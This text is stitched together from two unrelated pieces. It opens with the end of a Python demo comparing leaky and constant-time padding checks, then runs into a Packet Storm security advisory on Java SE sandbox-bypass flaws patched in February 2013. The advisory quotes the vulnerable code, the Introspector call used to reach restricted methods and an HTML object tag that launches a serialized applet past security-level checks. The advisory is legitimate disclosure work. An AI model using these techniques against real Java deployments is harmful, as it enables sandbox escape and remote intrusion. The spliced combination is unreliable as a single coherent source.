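    long_pad = build_record(*args, b"B" * 42, 33)    # 96 bytes, 34 pad bytes
    short_pad = build_record(*args, b"A" * 75, 0)    # 96 bytes, 1 pad byte
    bad_pad = long_pad[:-1] + b"\x7f"                # same length, invalid pad
    for name, rec in (("long pad", long_pad), ("short pad", short_pad), ("bad pad", bad_pad)):
        print(name, "leaky:", check_record_leaky(*args, rec),
              "constant:", check_record_constant(*args, rec))
```

The two 96-byte records with valid padding cost 4 and 5 compressions under the leaky check, and the corrupted one costs 5 again, so the count alone distinguishes them; the hardened check reports 5 for all three.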
-
Java SE CPU Feb 2013 Updates Explained Authored by Adam Gowdiak | Site security-explorations.com These are the technical details surrounding security issues reported by Security Explorations to Oracle and addressed in the Feb 2013 SE CPU update. Hello All, Below, we are providing you with technical details regarding security issues reported by us to Oracle and addressed by the company in a recent Feb 2013 Java SE CPU [1]. [Issue 29] This issue allows for the creation of arbitrary Proxy objects for interfaces defined in restricted packages. Proxy objects defined in a NULL class loader namespaces are of a particular interest here. Such objects can be used to manipulate instances of certain restricted classes. In our Proof of Concept code we create such a proxy object for the com.sun.xml.internal.bind.v2.model.nav.Navigator interface. In order to use the aforementioned proxy object, we need an instance of that interface too. We obtain it with the help of Issue 28, which allows to access arbitrary field objects from restricted classes and interfaces. As a result, by combining Issue 27-29, one can use Navigator interface and make use of its sensitive Reflection API functionality such as obtaining access to methods of arbitrary classes. That condition can be further leveraged to obtain a complete JVM security bypass. Please, note that our Proof of Concept code for Issues 27-29 was reported to Oracle in Apr 2012 and depending Issues 27-28 were addressed by the company sooner than Issue 29. Testing of the PoC will thus give best results on older versions of Java SE 7. [Issue 50] Issue 50 allows to violate a fundamental security constraint of Java VM, which is type safety. This vulnerability is another instance of the problem related to the unsafe deserialization implemented by com.sun.corba.se.impl.io.ObjectStreamClass class. 
Its first instance was fixed by Oracle in Oct 2011 [2] and it stemmed from the fact that during deserialization insufficient type checks were done with respect to object references that were written to target object instance created by the means of deserialization. Such a reference writing was accomplished with the use of a native functionality of sun.corba.Bridge class. The problem that we found back in Sep 2012 was very similar to the first one. It was located in the same code (class) and was also exploiting direct writing of object references to memory with the use of putObject method. While the first type confusion issue allowed to write object references of incompatible types to correct field offsets, Issue 50 relied on the possibility to write object references of incompatible types to...invalid field offsets. It might also be worth mentioning that Issue 50 was found to be present in Java SE Embedded [3]. That is a Java version that is based on desktop Java SE and is used in today's most powerful embedded systems such as aircraft and medical systems [4]. We verified that Oracle Java SE Embedded ver. 7 Update 6 from 10 Aug 2012 for ARM / Linux contained a vulnerable implementation of ObjectStreamClass class. Unfortunately, we don't know any details regarding the impact of Issue 50 in the embedded space (which embedded systems are vulnerable to it, whether any feasible attack vectors exist, etc.). So, it's up to Oracle to clarify any potential concerns in that area.
[Issue 52] Issue 52 relies on the possibility to call no-argument methods on arbitrary objects or classes. The vulnerability has its origin in com.sun.jmx.mbeanserver.Introspector class which is located in the same package as the infamous MBeanInstantiator bug found in the wild in early Jan 2013.
The flaw stems from an insecure call to the invoke method of java.lang.reflect.Method class:

if (method != null) return method.invoke(obj, new Object[0]);

In our Proof of Concept code we exploit the above implementation by making a call to getDeclaredMethods method of java.lang.Class class to gain access to methods of restricted classes. This is accomplished with the use of the following code sequence:

Introspector.elementFromComplex((Object)clazz,"declaredMethods")

Access to public method objects of arbitrary restricted classes is sufficient to achieve a complete Java VM security sandbox compromise. We make use of DefiningClassLoader exploit vector for that purpose.
[Issue 53] Issue 53 stems from the fact that Oracle's implementation of new security levels introduced by the company in Java SE 7 Update 10 did not take into account the fact that Applets can be instantiated with the use of serialization. Such a possibility is indicated both in HTML 4 Specification [5] as well as in Oracle's code. HTML 4 Specification contains the following description for the "object" attribute of APPLET element:
object = cdata [CS] This attribute names a resource containing a serialized representation of an applet's state. It is interpreted relative to the applet's codebase. The serialized data contains the applet's class name but not the implementation. The class name is used to retrieve the implementation from a class file or archive.
Additionally, Java 7 Update 10 (and 11) reveal the following code logic when it comes to the implementation of new security features (Java Control Panel security levels).
[excerpt from sun.plugin2.applet.Plugin2Manager class]

String object_attr = getSerializedObject();
String code_attr = getCode();
...
if(code_attr != null) {
  Class class1 = plugin2classloader.loadCode(code_attr);
  ...
  if(class1 != null)
    if (fireAppletSSVValidation())
      ...
} else {
  if(!isSecureVM) return;
  adapter.instantiateSerialApplet(plugin2classloader,object_attr);
  ...
}

The above clearly shows that the conditional block implementing Applet instantiation via deserialization does not contain a call to fireAppletSSVValidation method. This method conducts important security checks corresponding to security levels configured by Java Control Panel. The lack of a call to security checking method is equivalent to "no protection at all" as it allows for a silent Java exploit in particular. What's worth mentioning is that for Google Chrome the following HTML sequence needed to be used to activate target Applet code:

<object type="application/x-java-applet" object="BlackBox.ser">

---
We have made our original reports sent to Oracle and describing Issues 29, 50, 52 and 53 available for download from our project details page: http://www.security-explorations.com/en/SE-2012-01-details.html
Along with those reports we have also published the results of our quick Vulnerability Fix Experiment regarding Issue 50. We've never heard a word from Oracle regarding it. The company's fix for Issue 50 is not a mirror of the one we had proposed, but it does rely on Class object instances for hashtable access / caching of translated ObjectStreamClass fields.
At the end, we would like to question Oracle's evaluation of the impact of Java vulnerabilities fixed by the Feb 2013 Java SE CPU. Oracle emphasized that patched vulnerabilities affect primarily Java Plugin / desktop environments and that only 3 of them apply to client and server deployments of Java. The 3 vulnerabilities Oracle refers to are specifically the following ones:
CVE-2013-0437 Subcomponent 2D
CVE-2013-1478 Subcomponent 2D
CVE-2013-1480 Subcomponent AWT
None of the vulnerabilities above seem to refer to the components where our discoveries were made (i.e. CORBA, JMX / BEANS).
The tests we have conducted yesterday against the latest version of Oracle GlassFish Server 3.1.2.2 (with security manager enabled) and RMI Registry from JDK 7 Update 11 confirmed the possibility to launch an attack against remote RMI server with the use of a Java SE vulnerability. We tested Issues patched by the recent CPU such as the MBeanInstantiator bug, Issue 50 and 52 and were able to: 1) remotely load custom classes into the target Java RMI server (over RMI protocol), 2) completely break Java security sandbox with the use of a Java SE vulnerability (the one which "can be exploited only through untrusted Java Web Start applications / untrusted Java applets" according to Oracle's CPU). Although Oracle is aware [6] that Java SE vulnerabilities can be also exploited "in servers, by supplying malicious input to APIs in the vulnerable server component", the company rather undermines such a possibility by delivering a message that a majority of the vulnerabilities affect Java Plugin in the web browser or that in some cases, the exploitation scenario of Java SE bugs on servers is very improbable. In general, relying on a vulnerable Java SE version makes all of the products depending on it potentially vulnerable unless there is absolutely *no way* that a vulnerable component can be reached by an attacker. As long as an attack vector through RMI protocol is valid, a potential for remote exploitation of security issues in Java SE on servers should be always concerned. Thank You. 
Best Regards, Adam Gowdiak
---------------------------------------------
Security Explorations http://www.security-explorations.com "We bring security research to the new level"
---------------------------------------------
References:
[1] Oracle Java SE Critical Patch Update Advisory - February 2013 http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
[2] Oracle Java IIOP Deserialization Type Confusion Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-306/
[3] Oracle Java SE Embedded http://www.oracle.com/us/technologies/java/embedded/standard-edition/overview/index.html
[4] Oracle making embedded Java push http://www.infoworld.com/d/application-development/oracle-making-embedded-java-push-203168
[5] HTML 4 Specification, Including an applet: the APPLET element http://www.w3.org/TR/html401/struct/objects.html#h-13.4
[6] February 2013 Critical Patch Update for Java SE Released https://blogs.oracle.com/security/entry/february_2013_critical_patch_update
Source: Java SE CPU Feb 2013 Updates Explained ≈ Packet Storm